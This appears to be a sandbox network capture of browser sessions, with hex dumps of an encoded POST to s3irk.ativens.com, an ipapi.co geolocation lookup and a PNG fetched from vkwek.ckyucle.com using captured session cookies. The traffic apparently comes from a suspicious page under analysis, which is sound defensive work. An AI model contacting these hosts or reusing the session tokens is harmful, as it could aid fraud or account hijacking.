                                                              2024-07-03 07:41:11 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              84192.168.2.662969104.21.90.1674434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:10 UTC718OUTPOST /RYbeTFiWjDZgJJJpLPnlnELgJADpQWZTUKMIVRSXVMLEREXVNPFXMCCJOQKIVpq4KtkJY3tyzyxDzqeuv40 HTTP/1.1
                                                              Host: s3irk.ativens.com
                                                              Connection: keep-alive
                                                              Content-Length: 125
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              Accept: */*
                                                              Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Origin: https://vkwek.ckyucle.com
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:10 UTC125OUTData Raw: 64 61 74 61 3d 6b 7a 48 30 78 4a 78 37 62 6e 43 69 54 77 67 6e 54 6d 6b 43 77 4b 25 32 46 4e 32 69 51 4e 4b 35 6e 69 64 6f 38 6c 49 51 4d 62 52 69 25 32 42 6e 42 25 32 42 4d 63 36 39 6c 31 47 63 55 51 65 30 4e 44 6d 45 6e 78 72 68 32 53 6c 55 65 37 25 32 42 71 49 36 34 7a 42 6f 72 4e 75 38 31 70 35 47 61 52 6d 7a 31 69 6f 75 32 25 32 42 63 57 71 74 78 57 57 4f 6f 25 33 44
                                                              Data Ascii: data=kzH0xJx7bnCiTwgnTmkCwK%2FN2iQNK5nido8lIQMbRi%2BnB%2BMc69l1GcUQe0NDmEnxrh2SlUe7%2BqI64zBorNu81p5GaRmz1iou2%2BcWqtxWWOo%3D
                                                              2024-07-03 07:41:11 UTC638INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:11 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Content-Length: 812
                                                              Connection: close
                                                              vary: Origin
                                                              access-control-allow-origin: https://vkwek.ckyucle.com
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Do26ow6vQ4I1lnnkJH46TCRPrbp9Wxv7F0dZ6obprYAvI00z0qvdijuf4FalLCuioK3buB8VT6AnU2Xf1DbnAUGt8vmvwuFM9JI3Fcgvl8gmZelWBdP5SdIU4LLFJQZTxnpFDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b4f29c80fa4-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:41:11 UTC731INData Raw: 2b 70 64 4c 71 42 52 79 6f 61 46 67 31 30 67 59 68 2b 51 43 31 35 69 7a 66 30 71 34 34 68 76 4d 4b 55 74 59 57 36 2b 37 75 56 71 6c 31 4e 59 4a 38 61 71 58 66 43 6a 4d 38 42 4c 72 59 4f 6a 63 53 7a 65 33 71 70 69 2b 74 45 7a 43 45 58 41 43 67 2f 53 39 52 62 32 31 35 30 4a 70 48 4c 6c 53 58 43 36 73 34 56 79 30 36 49 55 6a 70 4a 2f 62 62 2f 7a 53 30 62 5a 2f 62 73 39 47 48 72 2b 30 2b 37 48 44 52 78 68 76 39 2f 33 77 41 64 6b 35 58 69 57 52 43 4e 75 4d 62 57 58 7a 44 64 4c 55 32 65 47 71 43 50 59 65 6f 71 6d 44 46 79 72 4e 6d 57 4e 53 52 47 36 68 34 69 39 48 46 57 31 61 53 41 52 64 36 64 78 44 41 45 42 73 46 37 59 41 47 6b 4a 59 4e 2f 35 50 33 6c 39 56 51 44 39 31 64 46 47 47 6e 76 37 4f 78 58 43 6b 64 4d 4b 4a 62 55 68 61 72 75 65 6f 4f 32 4a 6e 32 2b 48
                                                              Data Ascii: +pdLqBRyoaFg10gYh+QC15izf0q44hvMKUtYW6+7uVql1NYJ8aqXfCjM8BLrYOjcSze3qpi+tEzCEXACg/S9Rb2150JpHLlSXC6s4Vy06IUjpJ/bb/zS0bZ/bs9GHr+0+7HDRxhv9/3wAdk5XiWRCNuMbWXzDdLU2eGqCPYeoqmDFyrNmWNSRG6h4i9HFW1aSARd6dxDAEBsF7YAGkJYN/5P3l9VQD91dFGGnv7OxXCkdMKJbUharueoO2Jn2+H
                                                              2024-07-03 07:41:11 UTC81INData Raw: 46 33 31 58 37 32 77 50 5a 30 6b 79 2b 49 34 58 61 4f 31 63 4b 4a 33 5a 50 39 72 43 30 33 42 4f 30 51 32 75 4c 6f 51 44 63 51 30 4d 4e 69 36 4a 39 66 42 35 53 2f 6b 6a 51 64 53 34 6c 48 36 6f 63 78 6e 32 41 6c 76 2f 46 6d 63 31 41 31 5a 55 3d
                                                              Data Ascii: F31X72wPZ0ky+I4XaO1cKJ3ZP9rC03BO0Q2uLoQDcQ0MNi6J9fB5S/kjQdS4lH6ocxn2Alv/Fmc1A1ZU=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              85192.168.2.662968104.26.9.444434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:10 UTC349OUTGET /8.46.123.33/json/ HTTP/1.1
                                                              Host: ipapi.co
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:11 UTC661INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:11 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 763
                                                              Connection: close
                                                              Allow: POST, HEAD, OPTIONS, OPTIONS, GET
                                                              X-Frame-Options: DENY
                                                              Vary: Host, origin
                                                              X-Content-Type-Options: nosniff
                                                              Referrer-Policy: same-origin
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EsU7TR9tKfMY3DJyzBgoWwVkzwJWcBvQAa7iSJifkpNWyFgT2S5ZarkWatvmJueQzojSHnLXPAZrNBI%2BdPkpues00CRPPTEX42w2VbcIMYLPBejmf5%2BHvLae"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b4f599c15d7-EWR
                                                              2024-07-03 07:41:11 UTC708INData Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 4e 59 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e
                                                              Data Ascii: { "ip": "8.46.123.33", "network": "8.46.123.0/24", "version": "IPv4", "city": "New York City", "region": "New York", "region_code": "NY", "country": "US", "country_name": "United States", "country_code": "US", "coun
                                                              2024-07-03 07:41:11 UTC55INData Raw: 3a 20 33 32 37 31 36 37 34 33 34 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 41 53 33 33 35 36 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 4c 45 56 45 4c 33 22 0a 7d
                                                              Data Ascii: : 327167434, "asn": "AS3356", "org": "LEVEL3"}


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              86192.168.2.662970188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:11 UTC1130OUTGET /opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:11 UTC660INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:11 GMT
                                                              Content-Type: image/png
                                                              Content-Length: 29796
                                                              Connection: close
                                                              Content-Disposition: inline; filename="opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c0oSzJ5jrzy0acSVKe%2BeANDrtAz5doDVcb2rj7LoZpQNHDFMkiAnvtmfJF1Wl%2FN5xJsJauPLVewsVylfTZS0BvT98Z21Ats9pxXjuwUs5c5sW7%2Bzv7oFpS0B20G0fQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b506cee0f85-EWR
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57 87 6f a5 4a c8 6b
                                                              Data Ascii: PNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RWoJk
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 8d db b5 73 07 95 d0 ab 57 6f 8c 18 31 5c 6d 3c db b5 6f cf 65 a4 b9 ed 37 6c 34 c8 de f9 9c ca ed 1b 57 71 e6 d8 21 c4 bc 7e 25 ad 46 6e c1 93 d9 3b 21 77 57 f7 62 1a 58 a6 7e d3 97 cf 9e a4 93 7e 38 de bd 89 91 13 54 bb 4e 1d 4a f8 d5 ab 56 51 1b 27 45 9a 6d dd b6 9d 9b 34 71 82 b4 5a fd fa f5 e1 e4 e4 04 3b 3b c5 49 86 14 c9 66 df 33 04 84 88 40 5c 5c 1c a2 a3 a3 71 f2 e4 49 aa 9e 85 85 05 f6 1f 3c c4 76 c6 08 d1 59 7a d2 49 6b 03 ae 9e ec d1 59 b7 2f a2 5e d1 45 78 f1 f1 f1 b4 cf 8d 9b 36 c3 bb 7c 39 b5 f1 0c 0a 0a e2 5e be 7c 49 65 8d 9b be 00 e6 e6 e6 59 da 12 fb f6 0d 25 f8 1b 57 2f 4a bf 27 b7 e7 6b 07 36 42 ed c0 c6 3a b3 5f 99 8e ce 9d 08 a5 77 1b 3e 25 25 4a ab 9b 9a 9a 52 b2 27 7b f9 ed 0b e4 57 1b af ac fa 8f 8d 7b cf 05 b7 6f 47 07 3d 52 46
                                                              Data Ascii: sWo1\m<oe7l4Wq!~%Fn;!wWbX~~8TNJVQ'Em4qZ;;If3@\\qI<vYzIkY/^Ex6|9^|IeY%W/J'k6B:_w>%%JR'{W{oG=RF
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 1b 46 bb 23 59 d7 f6 ec d9 c3 1b 76 07 0f 1d e6 7e 19 31 5c 6a 8a 77 e5 6a 68 dd b1 bb ae 4c 13 4c 3f c5 5c 9d 50 b9 bc ea cf e6 33 0c 50 85 e8 df bc 79 83 80 80 00 a9 ed 9f 7a f4 c4 37 67 17 c1 60 c1 14 61 08 64 20 60 b1 7b 27 72 a7 9f 90 d9 be 7d 7b 4c 9c 38 31 5b 70 18 d1 b3 b8 61 33 7a 0d 62 60 ec b8 71 dc 9e f4 94 aa 9a ac 0c ff 51 85 a7 cf 5f 70 83 07 0e 00 b9 8d 4c 4a d1 e2 25 d0 63 e0 ff 34 d0 d4 70 9b 7a b8 bb c0 b7 4c 09 b5 7f 40 a9 42 f4 b7 6e dd 42 a7 4e 9d 28 58 df 0a 15 c2 a7 de 7d 0d 17 38 a6 b9 a8 11 c8 7d 27 02 16 bb 77 51 1b fd fc fc b0 6c 59 f6 27 33 32 a2 17 75 28 a8 6d 9c da 83 aa da 3d 1a 60 c3 67 2f 5e 72 ad 5b b6 c0 d7 af 5f a9 f6 db 76 ec 84 57 a9 92 bc 60 f7 eb 6f bf 71 3b 77 48 4e c0 cb 97 bf 00 7a 0c f8 9f d6 8f 95 15 aa 0b 4a
                                                              Data Ascii: F#Yv~1\jwjhLL?\P3Pyz7g`ad `{'r}{L81[pa3zb`qQ_pLJ%c4pzL@BnBN(X}8}'wQlY'32u(m=`g/^r[_vW`oq;wHNzJ
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 41 ed e2 e8 d2 67 12 2a 57 aa a4 31 ae 44 1e 9f 44 4f e4 91 59 bd af 83 3d 7d ce fe 3c 31 11 fb 9e 7d 3f 4e 57 d6 61 ed 8a 17 43 21 4b 4b dc 78 17 8b f3 59 3c cb 2e 6c 6d 0d 5f fb 82 70 b5 b6 41 64 42 3c c8 ad 70 56 18 02 ca 22 c0 88 5e 59 a4 58 bd ec 10 e0 65 80 15 23 bc 7f 2e 5c c4 2d 5f b6 94 9a d6 ba 4d 1b 4c 9b 3a 95 17 ac fa f6 eb c7 9d 3f 77 8e ca 6d d8 bc 0d 6a d6 09 94 83 8f dc d2 3e ba 7f 17 2c 2c 2c d1 ef 7f 63 50 a0 a0 83 41 c3 7b ee 64 28 9d c5 7f 4a fa 7e fc ab 67 d1 7c e8 d9 a1 1c 9a 07 7a 20 c5 aa 1e 2c f2 55 e1 05 5b be 89 de a0 81 67 ca 8b 06 01 46 f4 a2 71 a5 de 0c e1 65 80 d5 9b f6 5a ec b8 49 93 26 dc b3 67 cf 68 0f 8b ff 5e 8a ba b5 fd 35 c6 2a 21 31 89 0b 6a 10 88 84 84 04 2a 77 f0 a8 89 b0 2f e4 48 ff ff ec 71 24 f6 6d df 88 b7 31
                                                              Data Ascii: Ag*W1DDOY=}<1}?NWaC!KKxY<.lm_pAdB<pV"^YXe#.\-_ML:?wmj>,,,cPA{d(J~g|z ,U[gFqeZI&gh^5*!1j*w/Hq$m1
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 4e 9f 96 9c 00 66 69 65 8d af 5f 3e a3 ba 7f 00 ea 35 6a 26 f7 ac 9e 6c b5 0b dd bf 13 61 97 ce c1 2e 7f 01 ba 22 df b3 54 19 95 ed e1 a3 c1 f3 27 8f e8 73 f8 fb 11 37 e5 c4 75 6c 59 9a 3e 87 77 72 b0 96 7e 7e fa e2 4b 0c fe ed 18 fd bb 7b fb b2 18 d1 4f b5 43 5a d2 cc 4b c3 dc be 85 46 98 33 a2 e7 c3 eb 4c 86 d0 10 60 44 2f 34 8f 18 9e 3e 1a 0d ac 86 67 6e f6 1a f7 ea dd 9b bb 74 f1 22 ad 30 71 d2 64 04 b7 6f c7 2b 36 c1 c1 c1 5c 44 fa 61 27 0e 8e ce 08 ee d6 07 e4 5d b6 dc b8 72 11 87 f7 6e c7 e7 4f 49 a8 1d d8 08 01 8d 5a c8 7d 4f 16 ec e9 e2 64 3b d2 3f 39 23 fe c2 a9 a3 20 a7 cd 65 94 6a 15 9d e9 2c be 66 25 97 4c 40 de 79 18 8b 8e 03 f7 d1 cf 9b d6 2f 8e 19 63 fc 55 0a 8f 34 f3 12 30 b7 6f ad 11 e6 8c e8 55 82 9c 55 36 10 04 18 d1 1b 88 a3 04 ac a6
                                                              Data Ascii: Nfie_>5j&la."T's7ulY>wr~~K{OCZKF3L`D/4>gnt"0qdo+6\Da']rnOIZ}Od;?9# ej,f%L@y/cU40oUU6
                                                              2024-07-03 07:41:11 UTC1369INData Raw: d2 67 f1 e4 59 7d ad 80 20 d4 6d d8 04 b9 73 9b 49 01 20 e9 6f 0f ee da 8a db 37 ae c2 c1 d1 89 26 d7 71 2b ea 21 07 d0 cb 67 4f e0 ea 5e 2c 47 d0 22 6e 86 e1 c2 c9 63 78 f9 fc 89 b4 9e ad 8d 39 5d 68 47 66 f1 e4 a4 3e 75 cb c9 0b 2f 30 74 82 24 63 5e a9 e2 05 b0 75 59 73 95 44 71 b9 f2 22 b7 d3 00 f5 15 48 ef 8d 11 bd 4a b0 67 5b b9 6a 21 07 b4 2a 5a 14 cd 8b ba 23 af d9 f7 58 e4 47 7a d6 52 e2 be 7e c5 de a7 cf b0 eb e9 53 5c 7f f7 fd fc 04 6d f6 69 28 b2 19 d1 1b 8a a7 84 ab a7 c6 83 ab 70 4d 53 ac 59 f3 16 2d b8 c7 8f 1e d1 8a f3 16 fc 89 a0 06 9a 2d 06 cb a9 c7 51 a3 47 73 fb f7 49 f6 99 37 6f 17 82 62 25 4a d2 db f4 64 a6 ee 5e dc 93 12 38 59 74 27 5b c8 a9 70 e4 59 fd d7 af 5f e8 29 76 fe 01 f2 5b d6 62 5e 47 61 df b6 ff f0 e2 d9 63 84 f4 1e 48 6f
                                                              Data Ascii: gY} msI o7&q+!gO^,G"ncx9]hGf>u/0t$c^uYsDq"HJg[j!*Z#XGzR~S\mi(pMSY--QGsI7ob%Jd^8Yt'[pY_)v[b^GacHo
